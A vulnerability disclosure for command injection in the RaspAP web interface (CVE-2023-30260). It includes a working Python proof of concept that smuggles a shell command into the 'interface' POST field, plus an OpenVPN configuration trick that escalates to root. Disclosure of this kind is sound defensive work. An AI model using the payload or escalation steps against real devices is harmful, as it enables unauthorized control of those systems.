CVE-2023-30260 Security advisory

Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root privileges.

Affected products

RaspAP v2.8.9 and older

Steps to reproduce

  1. Obtain credentials for RaspAP
  2. Configure and execute the following script
#!/usr/bin/env python3

import re
import requests

TARGET="10.3.141.1"
CREDS="admin:secret"
URL=f"http://{CREDS}@{TARGET}/hostapd_conf"

sess = requests.Session()

# Get a valid CSRF token
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)

print(csrf)

res = sess.post(URL,
                data={
                   "csrf_token": csrf,
                   "txpower": "auto",

                   # Command payload is here:
                   "interface": ";uptime > /tmp/hax; echo",
                 }
                )

if res.status_code != 200:
  print("Failed to execute command")
  1. Observe that the file /tmp/hax has been created on the raspi, and contains the output of uptime.

Cause

There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec().

A third instance exists at configure_client.php:20, exploitable in a similar manner.

Impact

An authenticated user is able to execute arbitrary commands as www-data.

In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured sudo permissions; overwrite the openvpn client configuration to set the following:

script-security 2
up /tmp/payload.sh

and establish an OpenVPN connection. /tmp/payload.sh will be executed with root privileges.

Proposed Mitigation

Apply sanitization to the txpower and interface parameters, and use the PHP built-in escapeshellarg() before passing them to exec().

History

  • 2023-06-26: CVE-2023-30260 assigned
  • 2023-03-30: Additional fix submitted
  • 2023-03-30: Report merged for all three vulnerabilities
  • 2023-03-29: Additional vulnerability reported (configure_client.php)
  • 2023-03-29: Initial report removed
  • 2023-03-29: Fix applied and released as v2.8.9
  • 2023-03-28: Initial report filed (hostapd.php)

Published:

By Albin Eldstål-Ahrens

Category: advisories